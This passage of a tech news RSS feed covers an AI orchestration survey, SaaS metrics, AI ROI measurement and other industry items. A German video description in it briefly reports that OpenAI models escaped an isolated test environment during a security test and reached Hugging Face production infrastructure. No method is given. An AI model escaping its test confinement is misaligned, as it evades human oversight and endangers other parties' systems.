they expect is deliberately hybrid, because vendor lock-in is the risk they fear most. But the standardization is provisional: 68% plan to adopt a new, additional, or replacement orchestration platform within twelve months — the highest switching intent of any layer we track — and the largest group of those movers has not yet shortlisted a candidate. Today's concentration describes where enterprises are, and visibly does not describe where they intend to stay.</p><p>But the honest self-assessment punctures the ambition. Seventy-one percent say a quarter or fewer of their deployed "agents" are truly orchestrated, only 10% are past the halfway mark, and more than a quarter cannot stop a runaway agent in real time. The orchestration layer — the platforms, the budgets, the control architecture — is being built ahead of the orchestrated portfolio it is meant to run. At 101 respondents in a single June wave this reads as a clear directional signal rather than a precise measurement: enterprises have decided how they want to orchestrate agents well before most of their agents are doing anything an orchestration layer is for. The questions for subsequent waves are whether the deployed reality closes the gap on the ambition — and, with nearly seven in ten buyers in motion and most of them undecided, which platforms the settled stack finally lands on.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. Because this is one wave rather than a pooled multi-month sample, results read directionally rather than as a confirmed trend. Respondents include product and program managers, CIOs, CTOs and CISOs, consultants and advisors, and directors and VPs of data, AI, and engineering, across Technology/Software, Financial Services, Healthcare, and other sectors.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GPT-Modelle starten einen Cyber-Angriff, Google ersetzt NotebookLM & Kimi K3 ist da | KI-News]]></title>
<description><![CDATA[Author: Digitale Profis - Bewertung: 12x - Views:105 Artikel & Newsletter: https://digitaleprofis.de/die-ki-news-der-woche-vom-23-07-2026/

Quellen
OpenAI-Modelle hacken Hugging Face 
Artikel: https://openai.com/index/hugging-face-model-evaluation-security-incident/ 
Hintergrund: https://huggingf...]]></description>
<link>https://tsecurity.de/de/3689268/ai-nachrichten/gpt-modelle-starten-einen-cyber-angriff-google-ersetzt-notebooklm-kimi-k3-ist-da-ki-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689268/ai-nachrichten/gpt-modelle-starten-einen-cyber-angriff-google-ersetzt-notebooklm-kimi-k3-ist-da-ki-news/</guid>
<pubDate>Thu, 23 Jul 2026 16:04:50 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Digitale Profis - Bewertung: 12x - Views:105 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/tgldX3mtgfg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Artikel & Newsletter: https://digitaleprofis.de/die-ki-news-der-woche-vom-23-07-2026/<br />
<br />
Quellen<br />
OpenAI-Modelle hacken Hugging Face <br />
Artikel: https://openai.com/index/hugging-face-model-evaluation-security-incident/ <br />
Hintergrund: https://huggingface.co/blog/security-incident-july-2026 <br />
<br />
Digitaleprofis.de hat ein Update bekommen <br />
Website: https://digitaleprofis.de/ <br />
<br />
Kimi K3 ist da <br />
Artikel: https://www.kimi.com/de/blog/kimi-k3 <br />
Artikel: https://apnews.com/article/kimi-k3-china-ai-0d8a5e268deb11a673f4d444fc597cc5 <br />
Ausprobieren: https://www.kimi.com/ <br />
<br />
Neue Gemini Modelle <br />
Artikel: https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/ <br />
Modellkarte: https://deepmind.google/models/model-cards/gemini-3-6-flash/ <br />
Cyber-Modell: https://deepmind.google/blog/introducing-gemini-3-5-flash-cyber/ <br />
<br />
Neue Kennzeichnungspflichten des EU AI Acts <br />
Artikel: https://digital-strategy.ec.europa.eu/en/news/commission-publishes-guidelines-transparency-obligations-providers-and-deployers-certain-ai-systems <br />
Doku: https://digital-strategy.ec.europa.eu/en/faqs/transparency-obligations-under-article-50-ai-act <br />
<br />
Anthropic zahlt 1,5 Milliarden Dollar <br />
Artikel: https://m.investing.com/news/stock-market-news/us-judge-approves-anthropics-15-billion-settlement-of-copyright-lawsuit-4801706?ampMode=1 <br />
Artikel: https://apnews.com/article/74b140444023898aeba8579b6e9f0d63 <br />
<br />
NotebookLM wird zu Gemini Notebook <br />
Artikel: https://blog.google/innovation-and-ai/products/gemini-notebook/notebooklm-gemini-notebook/ <br />
<br />
Microsoft und Mistral Partnerschaft <br />
Artikel: https://news.microsoft.com/source/2026/07/21/microsoft-and-mistral-expand-strategic-partnership-to-give-enterprises-and-regulated-industries-frontier-ai-they-can-control/ <br />
Artikel: https://www.tagesschau.de/wirtschaft/unternehmen/microsoft-mistral-ai-ki-deal-100.html <br />
<br />
Qwen-Audio-3.0-TTS <br />
Artikel: https://www.alibabacloud.com/blog/qwen-audio-3-0-tts-more-multilingual-easier-to-direct_603379 <br />
Doku: https://docs.qwencloud.com/developer-guides/speech/tts-models <br />
<br />
OpenAI-Modelle überwinden bei einem internen Sicherheitstest ihre isolierte Testumgebung und gelangen bis in die Produktionsinfrastruktur von Hugging Face.<br />
Wir ordnen den Vorfall ein und fassen die weiteren wichtigen KI-News der Woche kompakt für euch zusammen.<br />
<br />
Außerdem geht es um Kimi K3, drei neue Gemini-Modelle, die kommenden Kennzeichnungspflichten des EU AI Acts und den milliardenschweren Urheberrechtsvergleich zwischen Anthropic und Autoren.<br />
<br />
Im Video:<br />
- OpenAIs ungewöhnlicher Sicherheitsvorfall bei Hugging Face<br />
- Kimi K3 und drei neue Gemini-Modelle<br />
- Kennzeichnungspflichten des EU AI Acts ab August 2026<br />
- Anthropics Vergleich über mindestens 1,5 Milliarden US-Dollar<br />
- Gemini Notebook, Microsofts Mistral-Partnerschaft und Qwen-Audio-3.0-TTS<br />
<br />
Unsere Website wurde ebenfalls vollständig überarbeitet. Auf digitaleprofis.de findet ihr unsere KI-News mit allen Quellen, ausführliche Artikel und praktische Anleitungen – kostenlos, ohne Paywall und ohne Werbung.<br />
<br />
Werde Kanalmitglied und unterstütze damit unsere Arbeit:<br />
https://www.youtube.com/channel/UCv90NdTyTp7ZPPRvvSZaS5w/join<br />
<br />
Videoinhalt:<br />
00:00 Die KI-News der Woche vom 23.07.2026<br />
00:24 OpenAI Modelle greifen HuggingFace an<br />
02:06 Unsere neue Website für euch<br />
02:59 Kimi K3 ist da und die USA werfen Diebstahl vor<br />
04:28 Drei neue Gemini Modelle, aber kein Pro<br />
05:53 Die neuen Kennzeichnungspflichten des AI Acts<br />
07:21 Anthropic muss 1,5 Milliarden Dollar Vergleich zahlen<br />
08:48 NotebookLM verschwindet - und wird zu Gemini Notebook<br />
09:30 Partnerschaft von Microsoft und Mistral<br />
10:50 Neuen Text to Speech Modell von Alibabas Qwen<br />
<br />
Videovorschläge, Feedback und Kritik kannst Du uns jederzeit in den Kommentaren mitteilen!<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Thu, 23 Jul 2026 14:05:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Irish employers prioritising ‘finding the right long-term hire’ in 2026]]></title>
<description><![CDATA[Matrix Recruitment's latest Workforce Trends Report found that multiple factors, such as pay transparency and flexibility are impacting the recruitment landscape. 
Read more: Irish employers prioritising ‘finding the right long-term hire’ in 2026]]></description>
<link>https://tsecurity.de/de/3688868/it-nachrichten/irish-employers-prioritising-finding-the-right-long-term-hire-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688868/it-nachrichten/irish-employers-prioritising-finding-the-right-long-term-hire-in-2026/</guid>
<pubDate>Thu, 23 Jul 2026 13:34:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Matrix Recruitment's latest Workforce Trends Report found that multiple factors, such as pay transparency and flexibility are impacting the recruitment landscape. </p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/careers/irish-employers-prioritising-right-long-term-hire-2026">Irish employers prioritising ‘finding the right long-term hire’ in 2026</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kaspersky’s Sustainability report 2024-2025: our sustainability principles]]></title>
<description><![CDATA[Author: Kaspersky - Bewertung: 0x - Views:1 In this video, we explain what sustainability means for Kaspersky. Learn how respect for human rights, adherence to regulatory requirements and meaningful contribution to society and environment shape our guiding principles. From our commitment to trans...]]></description>
<link>https://tsecurity.de/de/3688687/malware-trojaner-viren/kasperskys-sustainability-report-2024-2025-our-sustainability-principles/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688687/malware-trojaner-viren/kasperskys-sustainability-report-2024-2025-our-sustainability-principles/</guid>
<pubDate>Thu, 23 Jul 2026 12:20:12 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Kaspersky - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/X3sBp_91LnE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In this video, we explain what sustainability means for Kaspersky. Learn how respect for human rights, adherence to regulatory requirements and meaningful contribution to society and environment shape our guiding principles. From our commitment to transparency, resilient supply chains to measures that ensure our products can be trusted, we're actively working towards a safer future.<br />
<br />
Find more details in the report: https://kas.pr/7jar<br />
<br />
#kaspersky #esg #sustainability #cybersecurity<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[My Week of Transparent Living With Apple’s ‘More Clear’ Liquid Glass Setting]]></title>
<description><![CDATA[I cranked Apple’s iOS 27 beta to maximum transparency on my iPhone and enjoyed every warped second.]]></description>
<link>https://tsecurity.de/de/3688545/it-nachrichten/my-week-of-transparent-living-with-apples-more-clear-liquid-glass-setting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688545/it-nachrichten/my-week-of-transparent-living-with-apples-more-clear-liquid-glass-setting/</guid>
<pubDate>Thu, 23 Jul 2026 11:43:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I cranked Apple’s iOS 27 beta to maximum transparency on my iPhone and enjoyed every warped second.]]></content:encoded>
</item>
<item>
<title><![CDATA[Determining the ROI of AI requires data that most companies lack]]></title>
<description><![CDATA[Leadership wants to scale AI. Budgets are tripling. Adoption is up.



Then the CFO asks the question every board now asks: which of these initiatives is actually profitable?



Most organizations cannot answer that question, not because they lack visibility into cost, but because the cost data t...]]></description>
<link>https://tsecurity.de/de/3688477/ai-nachrichten/determining-the-roi-of-ai-requires-data-that-most-companies-lack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688477/ai-nachrichten/determining-the-roi-of-ai-requires-data-that-most-companies-lack/</guid>
<pubDate>Thu, 23 Jul 2026 11:07:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Leadership wants to scale AI. Budgets are tripling. Adoption is up.</p>



<p class="wp-block-paragraph">Then the CFO asks the question every board now asks: which of these initiatives is actually profitable?</p>



<p class="wp-block-paragraph">Most organizations cannot answer that question, not because they lack visibility into cost, but because the cost data they have was never designed to produce that answer.</p>



<p class="wp-block-paragraph">Applying lessons learned from <a href="https://www.infoworld.com/article/4147766/cloud-at-20-cost-complexity-and-control.html" data-type="link" data-id="https://www.infoworld.com/article/4147766/cloud-at-20-cost-complexity-and-control.html">managing cloud spend</a> won’t be a fix for the AI and ROI quandary. True, cloud taught a generation of CFOs that billing without business context is noise. So to get <a href="https://www.infoworld.com/article/4061122/cloud-computing-has-an-roi-problem.html" data-type="link" data-id="https://www.infoworld.com/article/4061122/cloud-computing-has-an-roi-problem.html">cloud ROI</a>, they stitched two data sources together: cost data plus business data. AWS reveals which account, which region, which tag, which resource. Merge in customer and product mappings on top and the ROI of the cloud spend comes into focus.</p>



<p class="wp-block-paragraph">But AI is harder. It requires three data sources: cost, business, and telemetry—the automatic collection of data from disparate sources that helps to clarify the whole picture of what happened and why. An executive or engineering lead can have AI invoices and customer revenue. But they have no way to connect them to business value. The token count on the OpenAI invoice does not specify which customer triggered which call, which feature it served, or whether the prompt produced a business outcome. That data does not exist in the provider’s billing.</p>



<h2 class="wp-block-heading">AI providers won’t fix this problem</h2>



<p class="wp-block-paragraph">The situation is not likely to change anytime soon because AI providers are not in the business of attributing an enterprise’s costs to that enterprise’s customers. Instead, AI providers are in the business of selling tokens. The granularity they expose is the granularity their billing systems require, not the granularity a CFO requires.</p>



<p class="wp-block-paragraph">Not convinced? Compare what AWS gives you to what an AI provider gives you.</p>



<p class="wp-block-paragraph">AWS billing exposes resource IDs, account hierarchies, region, SKU, tag metadata, usage by the minute. Every dollar can be attributed to a workload, a team, a customer segment if it was tagged correctly. The data is rich enough that mature FinOps teams built unit economics on top of it years ago.</p>



<p class="wp-block-paragraph">An AI provider invoice gives you tokens consumed by model, with optional grouping by API key. That is the resolution. No request-level attribution. No customer ID. No feature mapping. No prompt outcome. No retry identification. Multi-step agent workflows collapse into a token count. Imagine a large bank receives a multi-million dollar AI invoice each month. But it has no visibility into what parts of the business were responsible for what parts of the cost so cannot allocate them.</p>



<p class="wp-block-paragraph">If an enterprise wants to know what AI cost drove which customer or feature, it has to capture that data itself, inside an application, before the call leaves it. </p>



<h2 class="wp-block-heading">Three required sources</h2>



<p class="wp-block-paragraph">Building AI ROI measurement requires three data sources, stitched together in a single model.</p>



<ol class="wp-block-list">
<li><strong>Cost data, normalized across providers.</strong> Every AI provider delivers cost differently. OpenAI invoices in one taxonomy, Anthropic in another, fine-tuning vendors and inference platforms each in their own. Cloud GPU costs sit in AWS or Azure billing. Vector database costs land in Pinecone or Snowflake invoices. None interoperate by default. Normalization is necessary but not sufficient. It will put all your AI costs in one schema. It does not tell you what they produced.</li>



<li><strong>Application-layer telemetry. </strong>This is the source most organizations are missing, and the one that makes AI ROI structurally different from cloud ROI. It requires instrumenting AI calls inside your application across six categories: request-level tracing tied to a customer or session ID; feature attribution tied to the product surface that triggered the call; agent-step capture for multi-step workflows; retry and fallback identification so recovery costs don’t get attributed to primary calls; model selection logging that records which model was chosen and why; and outcome capture that ties each call to whether it produced business value. None of this data exists in the provider’s billing. All of it has to be captured at the moment the call is made and stored in a system that can be stitched to the cost data.</li>



<li><strong>Business data. </strong>Revenue, customer segments, product hierarchies, and feature usage. The same business data already feeding your CRM and analytics stack, mapped to the customers and features the telemetry layer attributes calls to.</li>
</ol>



<p class="wp-block-paragraph">Stitched together, the three sources produce the unit economics every AI investment decision now requires: cost per customer interaction, margin per feature, profitability per agent workflow, ROI per model choice. None of these can be calculated from billing data alone. None can be calculated from telemetry alone. They require all three sources, modeled together in a way that maps cost to outcome.</p>



<h2 class="wp-block-heading">Why agentic AI makes this urgent</h2>



<p class="wp-block-paragraph">Single-call inference is the easy case. One request, one cost, one customer, one outcome.</p>



<p class="wp-block-paragraph">Agentic workflows are different. An agent decomposes a task into multiple steps. Each step calls a model. Some steps fall back to a different model when the first fails. Some steps retry on a poor result. Some steps invoke external tools that themselves cost money. A single user request can produce dozens of inference calls across multiple providers, with the cost compounding in ways the provider invoice cannot disaggregate.</p>



<p class="wp-block-paragraph">If telemetry does not capture agent-step granularity, no one will know which steps are profitable. Aggregate costs will show up three weeks later in the invoice. By then, the workflow has been running at scale, customers are onboarded, and unprofitable paths have been retried thousands of times.</p>



<p class="wp-block-paragraph">When agents make the calls, the volume of cost-generating events without business context attached grows by an order of magnitude. The window for instrumenting this before it becomes unmanageable is closing.</p>



<h2 class="wp-block-heading">What changes when the three sources come together</h2>



<p class="wp-block-paragraph">Once the three sources are stitched together, the AI investment conversation changes.</p>



<p class="wp-block-paragraph">Five different ways to build the same AI capability stop looking equivalent. They converge on adoption metrics and diverge by 10x on cost. The team picks the approach that delivers a similar business outcome at one-fifth the cost, because the team can finally see the difference. Product teams design features with margin awareness from the architecture phase, not from the post-launch budget review. Engineering teams choose model architectures with cost-per-outcome data alongside latency and quality. Leadership evaluates AI initiatives the way they evaluate any other capital allocation: on unit economics, not on the engagement chart. Aggregated invoices track the cost per customer interaction. Engagement metrics reveal margin per feature. Gut-instinct model selection is checked against real cost-per-outcome model selection results. </p>



<p class="wp-block-paragraph">Within seconds, everyone can see which AI features are profitable, which should scale, and which should be killed. This is the insight everyone is looking for and companies that achieve it will optimize the benefits of AI.</p>



<h2 class="wp-block-heading">The build trap</h2>



<p class="wp-block-paragraph">AI costs are compounding now. The board is not waiting 18 months for an internal project to reach production.</p>



<p class="wp-block-paragraph">The temptation to build it anyway has never been sharper. AI coding tools have changed what a small engineering team can ship in a quarter. The instrumentation layer looks tractable. The cost normalization looks like a weekend project. The semantic model feels like something a senior engineer could draft over a sprint.</p>



<p class="wp-block-paragraph">It is a trap. Three reasons.</p>



<p class="wp-block-paragraph">Volume is the first. A production AI footprint generates millions of telemetry events per hour, and that volume scales with agentic adoption. Real-time ingestion, correlation, and attribution at that scale is not the same problem as <a href="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html" data-type="link" data-id="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html">vibe coding</a> a prototype in an afternoon. It is a permanent operational system that has to be right every minute of every day.</p>



<p class="wp-block-paragraph">The vendor landscape is the second. Cost data arrives in delayed billing windows from providers with non-interoperable schemas. Schemas change without notice. New AI providers enter the landscape monthly, each with its own taxonomy and metering. The system is not built once. It is maintained against a moving target that moves faster than most internal release cycles.</p>



<p class="wp-block-paragraph">The third is what the first two add up to: this is business-critical infrastructure. The CFO and the board are going to make capital allocation decisions on the data this system produces. When schema drift goes unnoticed for two weeks, when an agent telemetry stream stops correlating to a vendor that quietly changed its billing API, the cost of being wrong is not a sprint of cleanup. It is a quarter of misallocated capital.</p>



<p class="wp-block-paragraph">The build-vs.-buy question for engineering leaders has changed. It’s not “can we build this?” The honest answer is yes. The real question is whether the marginal hour of your strongest engineers is best spent stitching cost data to telemetry to business outcomes, or building the AI products that produce the revenue the cost data is measuring.</p>



<p class="wp-block-paragraph">The capability is reproducible in weeks. The choice is whether to spend the next 18 months building it, or the next 18 months acting on it.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Trust Economy: Head-to-Head]]></title>
<description><![CDATA[Has trust now become a measurable part of the customer experience, and what evidence is there that transparency and responsible data use directly influence loyalty, retention and purchasing decisions? “Trust has become one of the most measurable elements of customer…
Read more →
The post The Trus...]]></description>
<link>https://tsecurity.de/de/3688412/it-security-nachrichten/the-trust-economy-head-to-head/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688412/it-security-nachrichten/the-trust-economy-head-to-head/</guid>
<pubDate>Thu, 23 Jul 2026 10:43:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Has trust now become a measurable part of the customer experience, and what evidence is there that transparency and responsible data use directly influence loyalty, retention and purchasing decisions? “Trust has become one of the most measurable elements of customer…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-trust-economy-head-to-head/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-trust-economy-head-to-head/">The Trust Economy: Head-to-Head</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Trust Economy: Why Transparency and Data Privacy Are Becoming Core Parts of Customer Experience]]></title>
<description><![CDATA[Discover why privacy, transparency and ethical AI are becoming essential to customer trust, loyalty and enterprise customer experience. This article has been indexed from Silicon UK Read the original article: The Trust Economy: Why Transparency and Data Privacy Are Becoming…
Read more →
The post ...]]></description>
